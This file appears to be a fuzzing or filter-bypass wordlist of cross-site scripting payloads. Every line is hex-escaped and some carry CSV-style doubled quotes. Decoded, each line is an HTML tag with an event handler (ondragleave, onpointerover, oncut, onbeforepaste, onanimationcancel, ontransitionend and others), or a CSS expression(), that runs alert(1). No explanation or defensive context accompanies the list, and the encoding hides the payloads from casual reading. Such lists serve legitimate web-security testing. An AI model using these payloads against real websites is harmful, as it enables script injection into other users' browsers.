\x22\x3c\x63\x69\x74\x65\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x63\x69\x74\x65\x3e\x22
\x22\x3c\x76\x69\x64\x65\x6f\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x74\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x76\x69\x64\x65\x6f\x3e\x22
\x22\x3c\x74\x61\x62\x6c\x65\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x74\x61\x62\x6c\x65\x3e\x22
\x22\x3c\x63\x69\x74\x65\x20\x6f\x6e\x63\x75\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x63\x69\x74\x65\x3e\x22
\x22\x3c\x73\x75\x70\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x75\x70\x3e\x22
\x22\x3c\x6d\x65\x6e\x75\x69\x74\x65\x6d\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x6c\x65\x61\x76\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x6d\x65\x6e\x75\x69\x74\x65\x6d\x3e\x22
\x22\x3c\x73\x74\x79\x6c\x65\x3e\x40\x6b\x65\x79\x66\x72\x61\x6d\x65\x73\x20\x78\x7b\x66\x72\x6f\x6d\x20\x7b\x6c\x65\x66\x74\x3a\x30\x3b\x7d\x74\x6f\x20\x7b\x6c\x65\x66\x74\x3a\x20\x31\x30\x30\x30\x70\x78\x3b\x7d\x7d\x3a\x74\x61\x72\x67\x65\x74\x20\x7b\x61\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3a\x31\x30\x73\x20\x65\x61\x73\x65\x2d\x69\x6e\x2d\x6f\x75\x74\x20\x30\x73\x20\x31\x20\x78\x3b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x3c\x6d\x65\x74\x65\x72\x20\x69\x64\x3d\x78\x20\x73\x74\x79\x6c\x65\x3d\x22\x22\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x61\x62\x73\x6f\x6c\x75\x74\x65\x3b\x22\x22\x20\x6f\x6e\x61\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x63\x61\x6e\x63\x65\x6c\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x3c\x2f\x6d\x65\x74\x65\x72\x3e\x22
\x3c\x6d\x61\x72\x6b\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x6f\x76\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x6d\x61\x72\x6b\x3e
\x3c\x64\x65\x74\x61\x69\x6c\x73\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x6d\x6f\x76\x65\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x64\x65\x74\x61\x69\x6c\x73\x3e
\x3c\x73\x74\x79\x6c\x65\x3e\x2f\x2f\x2a\x7b\x78\x3a\x65\x78\x70\x72\x65\x73\x73\x69\x6f\x6e\x28\x61\x6c\x65\x72\x74\x28\x2f\x2f\x29\x29\x7d\x2f\x2f\x3c\x73\x74\x79\x6c\x65\x3e\x3c\x2f\x73\x74\x79\x6c\x65\x3e
\x22\x3c\x76\x69\x64\x65\x6f\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x65\x6e\x64\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x76\x69\x64\x65\x6f\x3e\x22
\x22\x3c\x66\x72\x61\x6d\x65\x20\x64\x72\x61\x67\x67\x61\x62\x6c\x65\x3d\x22\x22\x74\x72\x75\x65\x22\x22\x20\x6f\x6e\x64\x72\x61\x67\x73\x74\x61\x72\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x66\x72\x61\x6d\x65\x3e\x22
\x3c\x72\x74\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x65\x6e\x74\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x72\x74\x3e
\x22\x3c\x73\x74\x79\x6c\x65\x3e\x3a\x74\x61\x72\x67\x65\x74\x20\x7b\x63\x6f\x6c\x6f\x72\x3a\x20\x72\x65\x64\x3b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x3c\x66\x6f\x72\x6d\x20\x69\x64\x3d\x78\x20\x73\x74\x79\x6c\x65\x3d\x22\x22\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x3a\x63\x6f\x6c\x6f\x72\x20\x31\x30\x73\x22\x22\x20\x6f\x6e\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x63\x61\x6e\x63\x65\x6c\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\x22
\x22\x3c\x73\x74\x72\x69\x6b\x65\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6f\x76\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x74\x72\x69\x6b\x65\x3e\x22
\x22\x3c\x62\x72\x20\x6f\x6e\x62\x65\x66\x6f\x72\x65\x63\x75\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x62\x72\x3e\x22
\x22\x3c\x73\x74\x79\x6c\x65\x3e\x3a\x74\x61\x72\x67\x65\x74\x20\x7b\x63\x6f\x6c\x6f\x72\x3a\x72\x65\x64\x3b\x7d\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x3c\x74\x74\x20\x69\x64\x3d\x78\x20\x73\x74\x79\x6c\x65\x3d\x22\x22\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x3a\x63\x6f\x6c\x6f\x72\x20\x31\x73\x22\x22\x20\x6f\x6e\x74\x72\x61\x6e\x73\x69\x74\x69\x6f\x6e\x65\x6e\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x3c\x2f\x74\x74\x3e\x22
\x22\x3c\x73\x74\x79\x6c\x65\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x75\x70\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x22
\x22\x3c\x74\x65\x78\x74\x61\x72\x65\x61\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x6f\x76\x65\x72\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x74\x65\x78\x74\x61\x72\x65\x61\x3e\x22
\x22\x3c\x65\x6d\x20\x6f\x6e\x62\x65\x66\x6f\x72\x65\x63\x75\x74\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x65\x6d\x3e\x22
\x3c\x6b\x62\x64\x20\x6f\x6e\x70\x6f\x69\x6e\x74\x65\x72\x6f\x76\x65\x72\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e\x58\x53\x53\x3c\x2f\x6b\x62\x64\x3e
\x22\x3c\x6e\x6f\x73\x63\x72\x69\x70\x74\x20\x6f\x6e\x62\x65\x66\x6f\x72\x65\x70\x61\x73\x74\x65\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x20\x63\x6f\x6e\x74\x65\x6e\x74\x65\x64\x69\x74\x61\x62\x6c\x65\x3e\x74\x65\x73\x74\x3c\x2f\x6e\x6f\x73\x63\x72\x69\x70\x74\x3e\x22
\x22\x3c\x68\x31\x20\x6f\x6e\x6d\x6f\x75\x73\x65\x75\x70\x3d\x22\x22\x61\x6c\x65\x72\x74\x28\x31\x29\x22\x22\x3e\x74\x65\x73\x74\x3c\x2f\x68\x31\x3e\x22
